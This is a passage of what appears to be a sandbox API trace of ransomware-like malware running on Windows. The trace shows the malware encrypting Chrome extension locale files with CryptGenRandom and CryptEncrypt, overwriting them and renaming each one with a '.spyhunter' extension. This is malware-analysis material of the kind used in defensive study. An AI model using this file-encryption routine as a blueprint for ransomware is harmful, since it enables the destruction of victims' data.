Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json") returned 160 [0135.761] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.761] GetProcessHeap () returned 0x2c0000 [0135.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.761] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf35c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf35c*=0xb3, lpOverlapped=0x0) returned 1 [0135.762] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.762] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x25cf35c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf35c*=0xb3, lpOverlapped=0x0) returned 1 [0135.762] GetProcessHeap () returned 0x2c0000 [0135.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.762] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.762] WriteFile (in: hFile=0x180, lpBuffer=0x25cf39c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf35c, lpOverlapped=0x0 | out: lpBuffer=0x25cf39c*, lpNumberOfBytesWritten=0x25cf35c*=0x4, lpOverlapped=0x0) returned 1 [0135.763] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf35c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf35c*=0x30, lpOverlapped=0x0) returned 1 [0135.763] CloseHandle (hObject=0x180) returned 1 [0135.763] GetProcessHeap () returned 0x2c0000 [0135.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.763] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json.spyhunter") returned 170 [0135.763] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json.spyhunter")) returned 1 [0135.764] GetProcessHeap () returned 0x2c0000 [0135.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.764] GetProcessHeap () returned 0x2c0000 [0135.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.764] GetProcessHeap () returned 0x2c0000 [0135.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1a658 | out: hHeap=0x2c0000) returned 1 [0135.766] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf398 | out: pbBuffer=0x25cf398) returned 1 [0135.766] GetProcessHeap () returned 0x2c0000 [0135.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.766] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf390*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf390*=0x30) returned 1 [0135.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0135.766] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json") returned 157 [0135.766] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.766] GetProcessHeap () returned 0x2c0000 [0135.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.767] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf354, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf354*=0xb3, lpOverlapped=0x0) returned 1 [0135.768] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.768] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x25cf354, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf354*=0xb3, lpOverlapped=0x0) returned 1 [0135.768] GetProcessHeap () returned 0x2c0000 [0135.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.768] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.768] WriteFile (in: hFile=0x180, lpBuffer=0x25cf394*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf354, lpOverlapped=0x0 | out: lpBuffer=0x25cf394*, lpNumberOfBytesWritten=0x25cf354*=0x4, lpOverlapped=0x0) returned 1 [0135.768] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf354, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf354*=0x30, lpOverlapped=0x0) returned 1 [0135.769] CloseHandle (hObject=0x180) returned 1 [0135.769] GetProcessHeap () returned 0x2c0000 [0135.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.769] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.spyhunter") returned 167 [0135.769] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\messages.json.spyhunter")) returned 1 [0135.770] GetProcessHeap () returned 0x2c0000 [0135.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.770] GetProcessHeap () returned 0x2c0000 [0135.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.770] GetProcessHeap () returned 0x2c0000 [0135.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81a40 | out: hHeap=0x2c0000) returned 1 [0135.772] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf390 | out: pbBuffer=0x25cf390) returned 1 [0135.772] GetProcessHeap () returned 0x2c0000 [0135.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.772] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf388*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf388*=0x30) returned 1 [0135.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0135.772] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json") returned 157 [0135.772] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.772] GetProcessHeap () returned 0x2c0000 [0135.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.773] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf34c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf34c*=0xb3, lpOverlapped=0x0) returned 1 [0135.773] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.774] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x25cf34c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf34c*=0xb3, lpOverlapped=0x0) returned 1 [0135.774] GetProcessHeap () returned 0x2c0000 [0135.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.774] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.774] WriteFile (in: hFile=0x180, lpBuffer=0x25cf38c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf34c, lpOverlapped=0x0 | out: lpBuffer=0x25cf38c*, lpNumberOfBytesWritten=0x25cf34c*=0x4, lpOverlapped=0x0) returned 1 [0135.774] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf34c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf34c*=0x30, lpOverlapped=0x0) returned 1 [0135.774] CloseHandle (hObject=0x180) returned 1 [0135.774] GetProcessHeap () returned 0x2c0000 [0135.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.774] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.spyhunter") returned 167 [0135.774] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\messages.json.spyhunter")) returned 1 [0135.775] GetProcessHeap () returned 0x2c0000 [0135.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.775] GetProcessHeap () returned 0x2c0000 [0135.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.775] GetProcessHeap () returned 0x2c0000 [0135.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f818b8 | out: hHeap=0x2c0000) returned 1 [0135.778] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf388 | out: pbBuffer=0x25cf388) returned 1 [0135.778] GetProcessHeap () returned 0x2c0000 [0135.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.778] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf380*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf380*=0x30) returned 1 [0135.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0135.779] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json") returned 157 [0135.779] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.779] GetProcessHeap () returned 0x2c0000 [0135.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.779] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf344, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf344*=0xb3, lpOverlapped=0x0) returned 1 [0135.780] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.780] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x25cf344, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf344*=0xb3, lpOverlapped=0x0) returned 1 [0135.780] GetProcessHeap () returned 0x2c0000 [0135.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.780] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.780] WriteFile (in: hFile=0x180, lpBuffer=0x25cf384*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf344, lpOverlapped=0x0 | out: lpBuffer=0x25cf384*, lpNumberOfBytesWritten=0x25cf344*=0x4, lpOverlapped=0x0) returned 1 [0135.781] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf344, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf344*=0x30, lpOverlapped=0x0) returned 1 [0135.781] CloseHandle (hObject=0x180) returned 1 [0135.781] GetProcessHeap () returned 0x2c0000 [0135.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.781] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.spyhunter") returned 167 [0135.781] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\messages.json.spyhunter")) returned 1 [0135.782] GetProcessHeap () returned 0x2c0000 [0135.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.782] GetProcessHeap () returned 0x2c0000 [0135.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.782] GetProcessHeap () returned 0x2c0000 [0135.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82990 | out: hHeap=0x2c0000) returned 1 [0135.784] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf380 | out: pbBuffer=0x25cf380) returned 1 [0135.784] GetProcessHeap () returned 0x2c0000 [0135.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.784] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf378*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf378*=0x30) returned 1 [0135.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0135.784] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json") returned 157 [0135.784] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.784] GetProcessHeap () returned 0x2c0000 [0135.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.785] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf33c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf33c*=0xb3, lpOverlapped=0x0) returned 1 [0135.786] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.786] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x25cf33c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf33c*=0xb3, lpOverlapped=0x0) returned 1 [0135.786] GetProcessHeap () returned 0x2c0000 [0135.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.786] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.786] WriteFile (in: hFile=0x180, lpBuffer=0x25cf37c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf33c, lpOverlapped=0x0 | out: lpBuffer=0x25cf37c*, lpNumberOfBytesWritten=0x25cf33c*=0x4, lpOverlapped=0x0) returned 1 [0135.786] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf33c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf33c*=0x30, lpOverlapped=0x0) returned 1 [0135.786] CloseHandle (hObject=0x180) returned 1 [0135.786] GetProcessHeap () returned 0x2c0000 [0135.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.787] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.spyhunter") returned 167 [0135.787] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.spyhunter")) returned 1 [0135.787] GetProcessHeap () returned 0x2c0000 [0135.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.788] GetProcessHeap () returned 0x2c0000 [0135.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.788] GetProcessHeap () returned 0x2c0000 [0135.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81730 | out: hHeap=0x2c0000) returned 1 [0135.789] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf378 | out: pbBuffer=0x25cf378) returned 1 [0135.789] GetProcessHeap () returned 0x2c0000 [0135.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.789] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf370*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf370*=0x30) returned 1 [0135.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0135.790] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json") returned 157 [0135.790] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.790] GetProcessHeap () returned 0x2c0000 [0135.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.790] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf334, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf334*=0xb3, lpOverlapped=0x0) returned 1 [0135.791] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.791] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x25cf334, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf334*=0xb3, lpOverlapped=0x0) returned 1 [0135.791] GetProcessHeap () returned 0x2c0000 [0135.791] HeapFree (in: 